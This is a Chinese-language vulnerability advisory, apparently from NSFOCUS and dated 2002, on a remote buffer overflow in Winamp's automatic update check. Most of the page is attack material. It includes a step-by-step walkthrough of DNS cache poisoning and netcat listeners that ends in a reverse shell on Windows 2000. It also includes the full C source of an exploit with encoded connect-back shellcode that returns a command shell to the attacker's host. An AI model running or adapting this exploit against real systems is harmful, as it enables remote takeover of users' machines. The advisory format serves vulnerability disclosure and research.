首页 -> 安全研究

安全研究

安全漏洞
Nullsoft Winamp自动升级检查远程缓冲区溢出漏洞

发布日期:2002-07-05
更新日期:2002-07-15

受影响系统:

Nullsoft Winamp 2.79
Nullsoft Winamp 2.74
Nullsoft Winamp 2.73 (full)
Nullsoft Winamp 2.72
Nullsoft Winamp 2.71
Nullsoft Winamp 2.70 (full)
Nullsoft Winamp 2.65
Nullsoft Winamp 2.64 (standard)
Nullsoft Winamp 2.62 (standard)
Nullsoft Winamp 2.61 (full)
Nullsoft Winamp 2.60 (lite)
Nullsoft Winamp 2.60 (full)
Nullsoft Winamp 2.50
Nullsoft Winamp 2.80
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000
描述:

BUGTRAQ  ID: 5170

Nullsoft Winamp是一款支持MP3和其他多种文件类型的媒体播放器,可使用在Windows操作系统下。

Nullsoft Winamp在自动检查软件升级版本时对返回的响应缺少正确的检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。

Nullsoft Winamp有一个默认的选项,会在启动时自动从www.winamp.com站点上检查是否存在新的版本,然后通过消息框通知用户是否需要升级。Nullsoft Winamp对返回的应答缺少正确的处理,远程攻击者可以伪造www.winamp.com的应答,发送超大的应答消息,在解析数据的时候可导致进入无限循环,直至调用异常处理程序。精心构建应答数据可导致可能以winamp进程的权限在系统上执行任意指令。

通过DNS缓冲"毒药"方法,攻击者可以控制www.winamp.com的解析来利用这个漏洞进行攻击。

<*来源:2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0054.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)提供了如下测试方法:

名字服务器-192.168.0.1
攻击者机器-192.168.1.2
目标机器  -192.168.0.2

1)攻击者对名字服务器缓冲进行操作:

192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2)目标机器现在向攻击者机器解析www.winamp.com:

192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1


Name: www.winamp.com
Address: 192.168.1.2

3)攻击者进行利用下面的利用代码进行攻击:

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4)攻击者等待反向连接:

192.168.1.2:


x@x:~$ nc -l -p 5555

5)攻击成功:

192.168.0.2:


opens winamp, prepares for The Weather Girls - It's
Raining Men.mp3



6) BOOJAH!@


192.168.1.2:


x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:>

2c79cbe14ac7d0b8472d3f129fa1df(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com) 提供了如下测试程序:

/*
        wampexp.c
        July 3rd, 2002
         
        Winamp 2.80a and all previous remote exploit (connect-back styles)


        winamp has an option, enabled by default, which checks for the latest
        version from www.winamp.com and will then notify the user of a possible
        upgrade via a messagebox..
         
        unfortunately, if it were to receive a huge response via some nameserver
        corruption the thread parsing the response is thrown into an infinite
        loop and eventually the exception dispatcher is called.. and THEN like
        most of the time under windows a big, bad, overflow occurs..
         
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
             
            C:\>
         
        sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
        (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)
         
        yes, yahoo took away my 2! ;~~~
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>


// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";


// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..


unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";


main(char argc, char **argv){
        int i;
        unsigned short int a_port;
        unsigned long a_host;
        struct hostent *ht;
        struct sockaddr_in sin;
         
        if (argc < 3){
                printf("Winamp 2.80a remote exploit (7/3/2002)\n");
                printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
                printf("usage: %s <localhost> <localport>\n\n", argv[0]);
                printf("NOTE: target os is 2000.. probably works on all\n");
                printf("winamp versions prior to 2.80a as there are no \n");
                printf("dependancies on winamp, only the static ws2help\n\n");
                exit(-1);
        }


        // blatantly ripped! *TEEHEEEHHEH*
        a_port = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
         
        strcat(payload, shell);
         
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");


        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
        strcat(payload, "\x11\x01\xff\xe3");


        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
  
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
         
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
        strcat(payload, "\xd6\x19\x02\x75");


        // if ws2help doesn't match for some reason, use this call ebx..
        // dependant on the winamp in_wm.dll plugin
        //strcat(payload, "\x57\x22\x12\x01");
  
        strcat(payload, "\x0d\x0a");


        printf("%s", payload);
}

建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Nullsoft
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.winamp.com/



浏览次数:4273
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客